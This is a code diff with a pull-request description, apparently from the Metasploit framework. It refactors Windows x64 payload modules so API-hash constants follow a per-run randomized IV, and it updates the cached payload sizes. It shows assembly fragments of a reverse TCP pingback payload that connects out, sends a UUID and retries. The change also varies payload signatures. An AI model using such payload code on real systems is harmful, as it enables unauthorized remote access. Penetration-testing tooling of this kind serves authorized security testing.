-          mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
+          mov r10d, #{block_api_hash('ws2_32.dll', 'WSAStartup')}
           call rbp                ; WSAStartup( 0x0101, &WSAData );
 
         ; stick the retry count on the stack and store it
@@ -194,7 +195,7 @@ module MetasploitModule
           mov rdx, rax            ; push SOCK_STREAM
           inc rax                 ;
           mov rcx, rax            ; push AF_INET
-          mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
+          mov r10d, #{block_api_hash('ws2_32.dll', 'WSASocketA')}
           call rbp                ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
           mov rdi, rax            ; save the socket for later
 
@@ -204,7 +205,7 @@ module MetasploitModule
           pop r8                  ; pop off the third param
           mov rdx, r12            ; set second param to pointer to sockaddr struct
           mov rcx, rdi            ; the socket
-          mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')}
+          mov r10d, #{block_api_hash('ws2_32.dll', 'connect')}
           call rbp                ; connect( s, &sockaddr, 16 );
 
           test eax, eax           ; non-zero means failure
@@ -233,12 +234,12 @@ module MetasploitModule
         get_pingback_address:
           pop rdx                ; PINGBACK UUID address
           mov rcx, rdi           ; Socket handle
-          mov r10, #{Rex::Text.block_api_hash('ws2_32.dll', 'send')}
+          mov r10, #{block_api_hash('ws2_32.dll', 'send')}
           call rbp               ; call send
 
         close_socket:
           mov rcx, rdi           ; Socket handle
-          mov r10, #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
+          mov r10, #{block_api_hash('ws2_32.dll', 'closesocket')}
           call rbp               ; call closesocket
         ^
     if pingback_count > 0
@@ -249,7 +250,7 @@ module MetasploitModule
             dec r15               ;decrement the pingback retry counter
             push #{pingback_sleep * 1000}            ; 10 seconds
             pop rcx               ; set the sleep function parameter
-            mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')}
+            mov r10, #{block_api_hash('kernel32.dll', 'Sleep')}
             call rbp              ; Sleep()
             jmp create_socket     ; repeat callback
         ^

--- a/modules/payloads/singles/windows/x64/pingback_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/pingback_reverse_tcp.rb
@@ -40,7 +40,6 @@ module MetasploitModule
   end
 
   def generate(_opts = {})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     # 22 -> "0x00,0x16"
     # 4444 -> "0x11,0x5c"
     encoded_port = [datastore['LPORT'].to_i, 2].pack('vn').unpack('N').first

--- a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb
+++ b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb
@@ -4,7 +4,7 @@
 ##
 
 module MetasploitModule
-  CachedSize = 526
+  CachedSize = 525
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::BindTcp_x64

--- a/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb
+++ b/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb
@@ -4,7 +4,7 @@
 ##
 
 module MetasploitModule
-  CachedSize = 524
+  CachedSize = 523
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::BindTcp_x64

--- a/modules/payloads/stagers/windows/x64/reverse_http.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_http.rb
@@ -4,8 +4,8 @@
 ##
 
 module MetasploitModule
-  CachedSize = 607
-  CachedSizeOverrides = {"windows/x64/custom/reverse_http" => 628}
+  CachedSize = 586
+  CachedSizeOverrides = {"windows/x64/custom/reverse_http" => 606}
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows

--- a/modules/payloads/stagers/windows/x64/reverse_https.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_https.rb
@@ -4,8 +4,8 @@
 ##
 
 module MetasploitModule
-  CachedSize = 638
-  CachedSizeOverrides = {"windows/x64/custom/reverse_https" => 659}
+  CachedSize = 616
+  CachedSizeOverrides = {"windows/x64/custom/reverse_https" => 636}
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows

--- a/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb
@@ -4,7 +4,7 @@
 ##
 
 module MetasploitModule
-  CachedSize = 491
+  CachedSize = 490
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::ReverseTcp_x64

--- a/modules/payloads/stagers/windows/x64/reverse_winhttp.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_winhttp.rb
@@ -4,8 +4,8 @@
 ##
 
 module MetasploitModule
-  CachedSize = 751
-  CachedSizeOverrides = {"windows/x64/custom/reverse_winhttp" => 771}
+  CachedSize = 718
+  CachedSizeOverrides = {"windows/x64/custom/reverse_winhttp" => 734}
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows

--- a/modules/payloads/stagers/windows/x64/reverse_winhttps.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_winhttps.rb
@@ -4,8 +4,8 @@
 ##
 
 module MetasploitModule
-  CachedSize = 787
-  CachedSizeOverrides = {"windows/x64/custom/reverse_winhttps" => 807}
+  CachedSize = 750
+  CachedSizeOverrides = {"windows/x64/custom/reverse_winhttps" => 766}
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows


### PR DESCRIPTION
This PR updates the usage of `Rex::Text.block_api_hash` to take in account IV randomization.

The way it works is simple, the `BlockApi` and `BlockApi_x64` will generate, per-run, a random IV (32 bit value) and will patch on-the-fly the `asm_block_api` output and will pass the iv to the `Rex::Text.block_api_hash` to have the updated hash

There also some other fix here and there and slight edge-cases covered, like handling how the migration stub generation works and also the `exitfunk` handling using a helper